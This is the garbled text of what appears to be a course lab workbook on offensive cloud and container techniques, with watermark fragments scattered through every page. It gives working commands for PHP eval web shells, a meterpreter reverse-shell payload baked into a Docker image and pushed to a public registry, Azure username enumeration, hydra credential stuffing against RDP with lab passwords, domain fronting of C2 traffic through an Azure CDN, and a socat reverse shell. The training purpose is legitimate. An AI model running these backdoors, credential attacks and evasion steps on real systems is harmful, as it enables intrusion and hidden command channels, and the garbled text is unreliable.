$ curl http://localhost:8080/webshell.php?x=cat+/etc/passwd
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Now let's try the next command:

s1
ne
$ curl http://localhost:8080/lightshell.php
ljo
Gregg Harris
au
You will just see a Hi . To see why let's go ahead and cat out the le
<p
s
rri
$ cat /opt/php-webshell/code/lightshell.php
Ha
In the le you will see a string:

gg
re
:G
To
eval($_POST['x']);
d
n se
ce
Li
What this is telling the system is that whatever is being sent in a POST request after X must be evaluated as PHP.
How can we use such as strange shell?

live
$ curl -d 'x=system("ls");' http://localhost:8080/lightshell.php
Let's add many other commands:

$ curl -d 'x=system("ls;id;env;cat /etc/passwd");' http://localhost:8080/lightshell.php
Here what we see is the commands are bigger, we are just sending are system commands but entire PHP
3e1e3b497543e6c11ac8e4188959c93e
scripts can be sent in for evaluation at runtime.
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
You can always look at Wireshark and see the sizes. Obviously the response sizes will be large, but the request
66
sizes are now growing because these shells are very lightweight on the server but can be very large on the
s1
network and on the client.

ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
There are few problems with this shell.

ce
Li
live
1. It's not encrypted in any way, even if you wrap HTTPS around it, that can be intercepted in a Proxy.
2. The shell has no access control, anyone can run it.
We are going to add access control open the auth shell:
$ cat /opt/php-webshell/code/auth.php

This shell features a very interesting set of lines:
3e1e3b497543e6c11ac8e4188959c93e
if ($_SERVER['HTTP_AUTHORIZATION'] == 'Bearer 12345') {
....
if(isset($_POST['x')) {
20
20
We have two di erent checks here, rst we need a HTTP Header:
,
28
ly
Ju
Authorization: Bearer 12345
>
om
This is a statically weak password, but still its not a bare shell. You also need to POST to 'x' just like in the
previous example. Let's explore this.
_c
ok
We can copy of the previous
add the header.
-data
23169600 @
ou
tlo
POST commands from before and let's modify it to change the URL and
66
$ curl --header 'Authorization: Bearer 12345' -d 'x=system("id");'

s1
http://localhost:8080/auth.php
ne
ljo
Gregg Harris
We now have an authorization based header. No one would want to hack this way not really, however if we are in
au
the middle of choosing a operation and choosing a shell here are the properties of a Web Shell you want:
<p
s
1. If it's a lightweight shell there will be less evidence on the host, if there is a heavy shell all of your shells will
rri
Ha
have a payload that may contain things like passwords for authentication.
2. You may want to consider a shell that provides some type of authorization mechanisms
gg
3. You may want to consider wrapping this in not just transport layer encryption such as HTTP but also in
re
encryption that is in the stream itself.
:G
To
Conclusions
d
se
The ability for us to valiate and understand the changes that occur in the most sensitive parts of our
n
ce
infrastructure environments will be pandemount to understanding what is occuring in the overall architecture.
Li
Are defenders monitoring the most sensitive and critical les in their network? Is there something that they can
live
do to make the environment better? This includes modi cations to Docker les and .travis.yml les which are
very sensitive les in an organization.
In Lab 4.1 we should have reverted this ssh con guration le, please make sure this is done.

$ nano /home/sec588/.ssh/config
Please make it re ect the following:
3e1e3b497543e6c11ac8e4188959c93e
host github.com
20
Hostname github.com
20
#IdentityFile /home/sec588/.ssh/day4
,
User git
28
ly
Ju
>
This will allow wiki-updater.sh to work.
om
_c
ok
23169600 @
ou
tlo
66

s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Lab 5.2: Backdooring
3e1e3b497543e6c11ac8e4188959c93e
Containers
20
Brief Intro
, 20
28
This lab will introduce you to the concept of a backdoored container. There will be many di erent ways in which
ly
you can do this but we are going to show some of the gotcha's that you will encounter.
Ju
>
om
_c
ok
In this lab we will be creating an nGrok account for port fowarding TCP Tra c.
23169600
The following are the requirements for this to work:
@
ou
tlo
66
access to ngrok.io
s1
access to an email account that you can register with ngrok.io

ne
Metasploit Framework must be in the /opt/metasploit-framework directory

ljo
Gregg Harris
Docker will be running on your host.
au
<p
s
Please note this lab heavily will rely on Metasploit Meterpreter. Running any host antivirus on your host may
rri
inhibit the ability to execute meterpreter. Please remove that antivirus as required by the Course Requiremets.
Ha
gg
re
Try It Yourself
: G
To
To do this lab yourself, and be prepared for other labs:

d
n se
1. Create a ngrok account on their website

ce
2. Register your local ngrok with that account so that the authtoken works
Li
4. Run it from within your VM live

3. Build a meterpreter payload that will execute against your ngrok hostaname.
5. Build a Container that will execute the same payload from within the container.
Walkthrough

Let us begin by working on getting us a valid nGrok key. To do this open Firefox:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Navigate to www.ngrok.com . This will provide you with a page to sign up with a valid ngrok account, slick
ne
ljo
SIGN UP
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Once you are logged in, you can now copy the authtoken in step 3.
Ha
gg
re
: G
To
d
n se
ce
Li
live
The next part will to be to add the authtoken and test it. To do this you will need to open a terminal

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
From here you will need to type the following:

ljo
Gregg Harris
au


s
rri
ngrok http 9999

Ha
gg
If this worked correctl you should see a screenshot somewhat similar to below:
re
: G
To
d
nse
ce
Li
live
The URL is random for every student. Let's see how we can use this as a webserver

Open another MATE terminal:
$ cd /tmp
3e1e3b497543e6c11ac8e4188959c93e
Now go back to the Firefox Browser and go to:
20
20
http://<random-ngrok-hostname>.ngrok.io
,
28
ly
The attack we are going to execute will look like the diagram below, and yes, it is a circular like attack:
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
What you should see on the screen is something like so:

:
To
d
n se
ce
Li
live
Building a Linux Backdoor

To build a meterpreter linux backdoor let's rst play on our system.
Keep ngrok running
3e1e3b497543e6c11ac8e4188959c93e
CTRL-C or close the Python SimpleHTTPServer terminal window.
Once you do this, you can either open a new window or continue in the same window.
20
20
First is building our backdoor, with msfvenom we will create a standard stageless meterpreter.
,
28
$ mkdir /home/sec588/files/workdir/container
ly
Ju
>
$ cd /home/sec588/files/workdir/container
om
_c
What follows here below with the ngrok hostname is without the HTTP.
ok
23169600 ou
tlo
$ /opt/metasploit-framework/msfvenom -p linux/x86/meterpreter_reverse_http LHOST=<ngrok-
@
66
hostname> LPORT=80 -f elf -o a

s1
ne
$ chmod a+x ./a

ljo
Gregg Harris
au
This should complete successfull like below:

 ()
use exploit/multi/handler ()
live
set PAYLOAD linux/x86/meterpreter_reverse_http```
set LPORT 9999``` ()
()
set LHOST 0.0.0.0``` ()
exploit -j ()

To test this payload we can go into our original shell and run the following command:
$ ./a
3e1e3b497543e6c11ac8e4188959c93e
This should execute our payload and in our metasploit window we should see a new session created.
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
Once you have the executed payload working you can now interact with the system:
66
s1
ne
msf5> sessions -i 1
ljo
Gregg Harris
au
meterpreter> sysinfo
<p
s
If the system returns information you have a working backdoor type exit in metasploit meterpreter.
rri
Ha
You need metasploit meterpreter not the msfconsole itself

gg
re
CTRL-C in the .\a window.
: G
To
Building a backdoor container

d
se
Let's now build an example of an evil container to execute our payload. Open a text editor to create the following
n
le:
ce
Li
live
$ nano /home/sec588/files/workdir/container/Dockerfile
Inside of it type the following:

FROM ubuntu:latest ()
3e1e3b497543e6c11ac8e4188959c93e
RUN apt update -y && apt-get install curl wget -y
COPY a /bin/a
CMD ["/bin/a"]
()
()
()
20
20
CTRL-X in nano will close the le. Now we will need build our container:
,
28
ly
$ docker build -t studentX-a .
Ju
>
om
Once this builds, you will then locate the docker image:
_c
ok
$ docker image ls
Let execute our container, record the

23169600
latest ou
tlo
image id and put in the following command:
@
66
$ docker run -it -d <docker image id>

s1
ne
The container will appear broken, just leave this window running for a minute it will not show you a prompt. The
ljo
Gregg Harris
container should now be running let's attack to that process.
au
<p
In a NEW window type:

s
rri
Ha
$ docker ps
gg
re
You will see a ContainerID copy that number and run the following command:
: G
To
You may nd that everyone in a while the system will no longer connect. This is a problem with NGROK and as
d
se
such you may have to: Exit ngrok, restart it, rebuild your msfvenom command with the new url.
n
ce
Li
Switch over to the metasploit console window. We can now execute the following commands from within
msfconsole: live
You may have to hit enter to get the msf5> prompt
msf5> sessions -l

msf5> sessions -i <#>
meterpreter> sysinfo
3e1e3b497543e6c11ac8e4188959c93e
meterpreter> ps
This provides us a nice way to slide a backdoor into a container registry if we want to.
20
20
,
28
There is a way to copy a container into a public registry like docker hub as an example.
ly
Ju
>
1. Register an account with Dockerhub (http://hub.docker.com) .
om
2. Record your username with dockerhub. Example, mosesrenegade is the author's.
_c
3. Copy your container into the Dockerhub system. You will need to:
ok
23169600 @
ou
tlo
$ docker login ()
66
$ docker build -t <yourDockerHubUsername>/<yourContainerNameFromAbove> . ()

s1
ne
ljo
Gregg Harris
au
For example, the instructor would use:

/<yourContainerNameFromAbove>

:
To
d
4. Please note the container name <yourDockerHubUsername>/<yourContainerNameFromAbove>

se
5. Download the YAML le:

n
ce
Li
live
online wiki (http://wiki.<class-subdomain>.sec588.net/ les/kubs.yaml) or the local wiki (http://localhost/wiki/ les/kubs.yaml)
6. Edit the YAML so that we can run it in the container, replace the XXXX with your student number. Replace the
DOCKERNAME/DOCKERCONTAINER information with your docker information. Here is an EXAMPLE (do not
copy and paste it will not work).

For referenece replace the items below:
3e1e3b497543e6c11ac8e4188959c93e
run: student9001-a # This was replaced
name: student9001-a # This was replaced
()
()
run: student9001-a # This was replaced ()
20
run: student9001-a # This was replaced ()
- image: mosesrenegade/student9001-a # Containername
20
()
,
28
ly
Ju
7. To see if you have a kubectl: kubectl working type the following:
>
om
kubectl get pods
_c
ok
23169600
8. If you nd that are having challeged with that you can do the following to restore your kubecon g.
@
ou
tlo
66
s1
#!/bin/bash ()
ne
rm -Rf /home/sec588/.kube/config ()
ljo
aws eks update-kubeconfig --name class-eksctl-<class-subdomain> --region us-east-1 --
Gregg Harris
au
profile lab22 ()
<p
s
rri
Ha
9. To apply the yaml le and run your container in kubernetes:

gg
re
kubectl apply -f kubs.yaml
: G
To
0. You should go back to your metasploit section and if you nd that Metasploit is not able to run, use the
d
following to restart the job:

n se
ce
msf5> exploit -j
Li
live
It could be that exploit multi-handler did not work. This would x it.
Troubleshooting
Common issues include: kubectl get pods and you get the following issue:

CrashLoopBackOff
This is usually something wrong with the container build. Run your container from your sec588 virtual machine
3e1e3b497543e6c11ac8e4188959c93e
and make sure it still connects!
Alternativately if you see the following CrashLoopBackOff or ImagePullBackOff and don't see an issue,
do the following:
20
20
Get your pod name:
,
28
ly
kubectl get pods
Ju
>
Then describe your pod:
om
_c
kubectl describe pods <podname>
ok
23169600 tlo
Look at the errors to see if the image isn't pulling or the container isn't running.
@
ou
66
Conclusions
s1
We may wish to deploy a container with a backdoor, this may allow us to bury a container very deep into an
ne
environment so that we can start to laterally pivot and move around. Given that we may be in this scenario it is
ljo
Gregg Harris
critical for us to understand how to build containers correctly.
au
<p

s
rri
Ha
This lab takes what is a seemingly well known backdoor like meterpreter and let's us execute that in the context
gg
of a container.
re
G
:
To
d
se

n
ce
Li
live

Lab 5.3: Username
3e1e3b497543e6c11ac8e4188959c93e
Enumeration and Pivot
Setup
20
, 20
28
Brief Intro
ly
Ju
>
CDN Networks and Proxies are ubiquitous on the Internet today. The industry term for many of these devices
om
tend to be of one of the following:
_c
ok
1. Caching Devices
2. Proxies
3. Middleboxes
23169600 @
ou
tlo
66
Given that most tra c today is encrypted decrypting each packet is almost universally impossible. In some
s1
cases, it is not just cost-ine ective, but it also impossible when dealing with Desktop Applications. Many of the
ne
organization's content ltering devices leverage SNI information to lter but not decrypt the tra c. An attacker
ljo
Gregg Harris
can hide in their tra c sources by leveraging the CDN networks proxies to redirect attacks to their C2
au
environments.
<p
s
rri
These types of attacks are known as Domain Fronting, and we will be performing this attack today. To perform
Ha
this attack, we need to be able to control a CDN endpoint; for part one of our attack, we need to set up the CDN
Networks in Azure. Azure does still support Domain Fronting, and since our CDN shares the same system like
gg
the Microsoft CDN, we will be able to hide our tra c using Microsoft CDN systems.
re
: G

To
d
se
This lab requires a Web Browser and Access to Microsoft Azure.

n
ce
Li
Try It Yourself
live
To try this lab yourself you need to perform the following steps:
1. Figure out what users are alive in the Azure Portal by trying di erent usernames and observe the results.
2. Log in with a Valid User.

3. Setup a CDN Pro le with an Endpoint to an HTTP ngrok destination.
4. Call the pro le: studentX-sec588
5. Call the endpoint: studentX-sec588
6. Use port 8080 , start a SimpleHTTPServer on port 8080 in the directory.
3e1e3b497543e6c11ac8e4188959c93e
7. The CDN endpoint is used in a future lab.
php-webshell
Walkthrough
20
20
Finding the users in our environment.
,
28
Use Firefox to complete the following steps:
ly
Ju
>
Go to: https://portal.azure.com
om
_c
Come up with 5-10 random American/English rst names for example:
ok
23169600 @
ou
tlo
66
mike
will
s1
dustin
ne
lucas
ljo
nancy
Gregg Harris
au
barb
<p
s
rri
Ha
Append the following domains:

gg
re
: G
To
sec588.net
d
sec588.org
se
sec588.com
n
ce
Li
For example:
live

mike@sec588.net ()
3e1e3b497543e6c11ac8e4188959c93e
mike@sec588.org
mike@sec588.com
()
()
20
20
Do any of these work? What is the di erent in the login prompt when the following is used:
,
28
ly
Ju
jerry@sec588.com
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Now let's test our 'Domain Fronting' attack; to do this, let's rst start listening on a ngrok port. The rst part is to
listen on 8080. Let's move to a web directory:
3e1e3b497543e6c11ac8e4188959c93e
Make sure that Docker-compose is down.
$ cd /opt/php-webshell
20
$ docker-compose down
, 20
28
Get into our code directory.
ly
Ju
$ cd /opt/php-webshell/code
>
om
_c
ok
Open another terminal and start ngrok:
$ ngrok http 8080

23169600 @
ou
tlo
66
s1
One the rst terminal type the following:

ne
ljo
Gregg Harris
$ az login -u jerry@sec588.com -p HumanMusic2019
au
<p
Now that we are logged in as Jerry again let's set up a CDN network for the second part of our lab, this will take
s
some time to set up, so we will do this rst:

rri
Ha
az cdn profile create --name studentX-sec588 --resource-group <class-subdomain>-resources --

gg
location eastus --sku Standard_Verizon

re
:G
This will create a pro le for us to use with our Endpoints:

To
d
se
az cdn endpoint create --name studentXsec588 --profile studentX-sec588 --origin <ngrok URL> --
n
ce
resource-group <class-subdomain>-resources --query-string-caching BypassCaching

Li
live
The following is an instructor example so students can validate what their command line may look like.
az cdn profile create --name student9001-sec588 --resource-group <class-subdomain>-resources -

-location eastus --sku Standard_Verizon

az cdn endpoint create --name student9001sec588 --profile student9001-sec588 --origin
abc231abc23.ngrok.io --resource-group <class-subdomain>-resources --query-string-caching
BypassCaching
3e1e3b497543e6c11ac8e4188959c93e
Once this is setup, we will then need to use the Azure Portal to nish setting up the endpoint as not every feature
is available over the az cli.
20
Use Firefox to complete the following steps:
, 20
28
Go to:
https://portal.azure.com
ly
Ju
Log in as the Jerry user to be able to perform the operations to add a CDN into the system.
>
om
From the Azure Portal Search button type: cdn
_c
ok
The CDN Pro les area should show up:
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
Once in this menu, navigate to:

:
To
d
studentX-sec588 | Click the studentXsec588.azureedge.net endpoint

n se
ce
Once you are in the Endpoint con guration, you need to change two option.
Li
Click on the Origin menu and add the live

Origin Host Header . CLICK SAVE

3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
ly
Ju
>
om
Click on the Caching Rules menu and change the Cache Behavior to Bypass Cache .
_c
ok
CLICK SAVE
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
From this point on the ngrok HTTP Window should not be closed. This URL is dynamic and is currently tied to your
To
CDN. This process takes anywhere from 10 minutes to 60 minutes to be made avaialble on the internet. If you
d
se
close the ngrok HTTP Window Lab 5.5 may take longer than expected.
n
ce
Li
This may take up to ve minutes to propagate, please give it some time.
live
Conclusion
In this lab, we have demonstrated how we can perform username enumeration, which is a key component of
username and password guessing attacks. We have also started the setup of our CDN Domain Fronting lab,

which is a requirement for Lab 5.5.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
ce
Li
live

Lab 5.4: Credential Stuf ng
3e1e3b497543e6c11ac8e4188959c93e
Lab
20
Brief Intro
, 20
28
We wanted to make sure that all of our students understand the importance of a few things.First, why Multi-
ly
Factor Authentication is critical in any environment by performing a password guessing attack. Secondly, we
Ju
would like to our students to better understand why this methodology work. Third, we want to demonstrate how
>
to actually perform a Credential Stu ng attack as many of these attacks are still relatively unknown.
om
_c
ok
This lab requires a few items:
23169600 @
ou
tlo
66
1. hydra the command line tool

s1
2. pw-inspector the command line tool

ne
3. You will need the rockyou-10k.txt le on /home/sec588/files/wordlists/rockyou-10k.txt

ljo
Gregg Harris
au
Try It Yourself
<p
s
rri
To try this yourself you will do the following.

Ha
gg
1. Run az vm list-instances and obtain the PublicIpAddress for the dc1 host.
re
2. The dc1 host has RDP enabled.
G
3. Build a list of known users consider what you know about the environment: administrator , jerry ,
:
To
summer , george , azure , sec588 .

d
4. Create a special wordlist called /tmp/rockyou-small.txt by using pw-inspector .

se
5. Use pw-inspector to trim the wordlist to the default Windows2019 password complexity rules: lowercase ,
n
ce
uppercase , numbers , special characters , and three of the four combinations.

Li
Remember you will probably need a minimum

6. Next trim the wordlist to the rst 10,000 lines:
wordlist called
live
cat /tmp/rockyou-small.txt
/home/sec588/files/workdir/rockyou-smaller.txt
place the results in a
Walkthrough

Let's open the MATE terminal so that we can get our local environment con gured:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
One the rst terminal type the following:

rri
Ha
gg
$ cd /home/sec588/files/wordlists
re
G
Let's look at the wordlist called: rockyou.txt

:
To
d
$ wc -l rockyou.txt
n se
ce
You should see:

Li
14344391 rockyou.txt live

The next item is to take pw-inspector and make the following modi cations:
$ pw-inspector -i rockyou.txt -o /tmp/rockyou-small.txt -m 8 -M 16 -c 3 -l -u -n -p

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
Next we will count the number of words in this smaller le:
ly
Ju
>
$ cat /tmp/rockyou-small.txt | wc -l
om
_c
This should now be ~750,000 lines:
ok
734298 /tmp/rockyou-small.txt 23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
 /home/sec588/files/workdir/rockyou-smaller.txt

gg
re
This wordlist is now 10,000 lines long. This is considerably smaller than what we started with. Let's see how this
G
small wordlist is not su ciently fast for our purposes.

:
To
d
Let's now get a PublicIpAddress .

n se
ce
Getting our target IP address

Li
live
The easiest way for us in our IP addresses in Azure is run the following command:
The syntax is less than ideal, unfortunately.

az vm list-ip-addresses --query '[].virtualMachine.[ name,
network.publicIpAddresses[0].ipAddress ]' -o table --resource-group <class-subdomain>-
resources
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
This will display the computers on the left and the Ip Addresses on the right.
ly
Ju
Copy the DC1 IP address as it will be our target.
>
om
Hydra Users and Passwords
_c
ok
Let's attempt to build a users le that we can work with:
23169600
$ nano /home/sec588/files/workdir/users.txt
@
ou
tlo
66
In this le on every line, let's create a line by line list:

s1
ne
ljo
Gregg Harris
au
administrator
<p
admin
s
summer
rri
jerry
Ha
sec588
george
gg
re
: G
To
Why these words? Well in previous labs we had a usernamed summer, we had one named jerry, we also have
d
some standard ones, like administrator, admin, and for fun we are throwing the class name in here. Sometimes
se
usernames for service accounts end up being company names, project names and the like.
n
ce
Li
Let's review what we now have:
username file :
live
/home/sec588/files/workdir/users.txt
password file : /home/sec588/files/workdir/rockyou-smaller.txt

target ip : <publicIpAddress> from above
Standard Dictionary Attack
3e1e3b497543e6c11ac8e4188959c93e
The rst attack will be a standard dictionary attack:
NOTE THIS ATTACK WILL NOT FINISH read on after you hit ENTER
20
20
,
28
$ hydra -L users.txt -P rockyou-smaller.txt -t 4 rdp://<publicIpAddress>
ly
Ju
>
om
_c
ok
23169600 ou
tlo
This will take a long time to work, by our estimation after 2 or 3 minutes you will see a [STATUS] message. If
you read it, it will state that you will nd you password after 1.5 to 2 hours. Let's see the di erent between this an
maybe a more targetted attack:
@
66
s1
Let's now try a password attack that is more targetted with a targetted wordlist.
ne
ljo
Targetted Wordlist
Gregg Harris
au
<p
Let's build the following wordlist:

s
rri
Ha
$ nano /home/sec588/files/workdir/password-target.txt
gg
re
G
Spring2018
:
To
Summer2018
Fall2018
d
se
Winter2018
Spring2019
n
ce
Summer2019
Fall2019
Li
Winter2019
Spring2020 live
$ hydra -L users.txt -P password-target.txt -t 4 rdp://<publicIpAddress>

This attack will take less than 5 minutes, as its now only 54 attempts. You could slow this down to meet a
password policy and avoid lockout which is a hugely critical item.
3e1e3b497543e6c11ac8e4188959c93e
Credential Stuf ng Slow Attack
Finally let's show you how to build a credential stu ng attack.
20
$ nano /home/sec588/files/workdir/stuffing.txt
, 20
28
ly
Administrator:Administrator
Ju
admin:admin
>
summer:SnakeJazz2020
om
jerry:HumanMusic2019
sec588:Winter2019
_c
ok
23169600 ou
tlo
So here we have an extremely targetted wordlist, only 1 attempt per user. This is arguably faster than what we
@
had before.
66
s1
$ hydra -C stuffing.txt -t 4 -W 1 rdp://<publicIpAddress>

ne
ljo
Gregg Harris
This works our methodology in reverse. How would we do this in the real world:
au
<p
1. Build a list of users, there maybe some guessing here or you may be informed
s
rri
2. Build a list of passwords that each user may have used, this may have been through exposed password
Ha
leaks.
3. Once the list is exhausted, attempt to guess common passwords
gg
4. You can also build a targeted wordlist using a tool like CeWL
re
5. Once both of these options are done you can move into larger dictionary lists.
: G
To
Remember you do not need to crack ALL the users accounts, typically you need one or more.
d
nse
Conclusions
ce
Li
live
This lab was designed to cover a critical component of Penetration Testing and that is the use of passwords,
credential stu ng, and targetted wordlists in a penetration test. Passwords are a critical part of testing, don't
disregard it.
Sometimes you will nd a list of username and passwords in a larger lists, other times you will nd that users
have very predicable passwords over time. Keep this in mind.

You seldom nd valid and good information on using good password tools against live targets. The information
3e1e3b497543e6c11ac8e4188959c93e
is not always available to you, it's almost certainly not well documented at times. This lab helps you start working
through these issues.
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 5.5: C2 Redirections
3e1e3b497543e6c11ac8e4188959c93e
and Obfuscations
20
Brief Intro
, 20
28
In Lab 5.3, it was discussed that CDN's are a critical component of the internet. It allows Content Providers to
ly
move large datasets much closer to the end-user. Content Delivery Networks quite often are built of proxies and
Ju
proxy-like technologies. These proxies, however, are front-ending almost all customers, typically in a shared
>
environment, for scalability. How does a shared proxy system move tra c from its front door over to the actual
om
system?
_c
ok
The host: header directs the tra c accordingly. Here is an example:
Going to do.skype.com
23169600 ou
tlo
the packets are formulated to resolve this to the azurecdn server:
@
example.azureedge.net .
66
s1
ne
The HTTP Header is formulated as so:

ljo
Gregg Harris
au
<p
s
GET / HTTP/2
rri
Host: do.skype.com
Ha
gg
re
G
What if we ask our system to go to https://do.skype.com , yet redirect the Host: header to our EvilC2?
:
To
d
The system formulates a request to do.skype.com . The tra c does forward to azureedge and potentially
se
depending on the system include the SNI in the certi cate. The proxy will redirect the tra c to
n
do.skype.com
ce
us.
Li
live
Why would we want to do this? To hide our real intent and evade Proxies.

This lab requires that Lab 5.3 is completed so that the Azure CDN network is now built and made available for
you to use.
3e1e3b497543e6c11ac8e4188959c93e
Once of the other important things about this lab is that you do not close or interfere with the ngrok http
process. Internet connectivity, the lab is self contained running from your computer. You will need the following
tools:
20
, 20
Try It Yourself
28
ly
Ju
>
om
1. Make sure you can get to your machine using the Azure CDN.
_c
2. Call the pro le: studentX-sec588
ok
3. Call the endpoint:
23169600
student1-sec588
tlo
4. Use port 8080 , start a SimpleHTTPServer on port 8080 in the php-webshell directory.
5. While this builds, switch to the socat lab
ou
@
6. At this point the CDN shold be available run the following commands:
66
curl to download the azureedge endpoint to make sure you can access your webshell directory
s1
curl to download the same endpoint to make sure you can get the Host header pointing to azureedge but
ne
the request going to do.skype.com .

ljo
Gregg Harris
au
Walkthrough

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Make sure sure that the ngrok system is running.

ljo
Gregg Harris
au
In the new window let's make sure that we are running the python server still.
<p
s
rri
Make sure you have a window with the following command still running:
Ha
gg

re
G
Playing around with Domain Fronting!

:
To
While our shell is propogating let's get everything setup to work with domain fronting. First let's understand what
d
se
we are trying to do, using tcpdump we can start to get an idea for what we will be attempting to do in our
n
environment.
ce
Li
live
Open a MATE Terminal and type the following commands:
$ sudo wireshark
This will bring up wireshark in the environment. Wireshark will be our validation engine for us.

When setting up wireshark it would be more ideal to only lter for 443 tra c. In the capture lter type:
port 443
3e1e3b497543e6c11ac8e4188959c93e
Choose the eth0 interface, which maybe the default chosen. Once you click on the Shark n it will start capturing
tra c.
20
20
,
28
ly
Ju
>
om
_c
ok
Now let's make a connection using curl. Open another MATE terminal and type:
23169600
$ curl https://studentXsec588.azureedge.net
@
ou
tlo
66
In the display lter section at the top type:

s1
ne
ljo
ssl.handshake
Gregg Harris
au
<p
This will display only the handshakes which will show the initial Client Hello Message. If we have
propogated everything correctly you will see a message in Wireshark for a TLS1.3 Client Hello Message.
s
rri
Ha
You need to nd that message, once you do you can open it by clicking:
gg
re
Secure Sockets Layer | TLS 1.3 Record Type | Handshake Protocol | Extensions: Server
G
Name Indicator
:
To
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
What will our content lters see as the server we are going to? Few options here, one is that we will do a DNS
>
om
Lookup for student1sec588.azureedge.net and this will be the server that is used. There is another option, and
_c
that option is that we will not be using azureedge.net at all we could use a legitimate service. Let's explore that
ok
option.
Click the wireshark stop button. 23169600 @

ou
tlo
66
We know that using our own C2 domain could be problematic. It could be blocked or it could reveal our attacker
s1
infrastructure. Let's move to hiding our attack, what we will do is request an AzureCDN based website that is
ne
hosted by azureedge. We could nd these by doing a google dork. A few know URLs:
ljo
Gregg Harris
au
do.skype.com
<p
s
rri
ajax.microsoft.com
Ha
Since these sites are all HTTPS what will our content lters see?
gg
re
G
do.skype.com
:
To
This a Skype URL that will be allowed through in many locations, how will we get to our attacker infrastructure?
d
se
We will tell our Proxy that the host we are requesting is ACTUALLY our attacker infrastructure.
n
ce
Li
Let's start wireshark again ltering on 443.
live
Going back to our window we now type a new command, this time the studentXsec588.azureedge.net is
now going to be our host header NOT the host we are going to initiate communication with. The host we will
initiate communication with is skype.
Run this command:

$ curl --header "Host: studentXsec588.azureedge.net" "https://do.skype.com"
Wireshark now gets a new CLIENT HELLO. This time it will not be from studentX attacker infrastructure it will be
3e1e3b497543e6c11ac8e4188959c93e
from do.skype.com. Our content lters will believe we are talking that domain and we will not be able to block it if
we are legitimately using skype in our environments.
20
, 20
28
ly
Ju
>
om
_c
ok
This is how domain fronting works, both requests will provide the same results but content lters and dns lters
23169600
will see di erent requests destinations.
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Conclusions
re
G
Domain Fronting and Redirections through alternative methods can be useful in hiding what we are trying to do,
:
speci cally in avoiding detections and creating new pathways to valid websites and channels. Domain Fronting
To
while supposedly 'dead' is actually a valid attack path in a few service providers. The danger is that the service
d
se
provider may notice that you are using this channel so you must tread carefully.
n
ce

Li
live
This lab shows us another way to evade detection when conducting redteam activities by using the very same
cloud infrastructures that we may be assessing in order to circumvent protections. Defenders have to nd new
and better ways to detect what it is that we are trying to do, while the attackers have to then nd new ways to
evade defenders. This is another great example of that count and mouse game that we play.

Lab 5.6: Sockets and OS
3e1e3b497543e6c11ac8e4188959c93e
Redirections
20
Brief Intro
, 20
28
We will be playing with some of the Redirection options to help you build really dumb relays and really simple
ly
relays as options for the following actions that you may need to use in your environment:
Ju
>
1. Getting a reverse shell locally
om
2. Using ngrok to pivot between local and remote
_c
3. Using socat to port forward
ok
ou
tlo
66
This lab does not require internet connectivity, the lab is self contained running from your computer. You will
s1
need the following tools:

ne
ljo

Gregg Harris
au
NGrok, SoCat
<p
s
rri
Try It Yourself
Ha
gg
re
G
1. Shovel a Socat shell to yourself, and run some commands, notice that the shell is an actual shell, and not a
:
To
limited shell, run: tty

d
2. Bring down the ngrok http shell and move to a tcp ngork redirection. Play with the tcp redirection and socat.
se
3. Forward a port with Socat so that you can move from one port to another.
n
ce
Li
Walkthrough
live

3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
$ cd /tmp
ljo
Gregg Harris
au
<p
Notice the /tmp this will be our attacker shell, we will be creating a REVERSE connection INTO this shell.
s
rri
Ha
Enter this command and hit ENTER:

gg
re
$ socat file:`tty`,raw,echo=0 tcp-listen:9998
: G
To
What does this command do? It opens a le handle and executes a tty shell, it is a raw shell and the
d
is set to o (or 0 ).
se
echo
n
ce
The next part instructs it to listen on TCP Port 9998.

Li
Open another window in MATE Terminal: live

$ cd /home/sec588
$ ifconfig eth0

Record the Linux IP address
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your-linux-ip>:9998
3e1e3b497543e6c11ac8e4188959c93e
What does this commadn do? It runs an executable of
stdout. It iwll then connect to your computer on port
bash -li , it is attached as a pty, with stderr, stdin, and
9998 .
20
Go back to your original window, if prompt changes from sec588@slingshot:/tmp $ to
20
sec588@slingshot:~$ you have now created a socat shell.
,
28
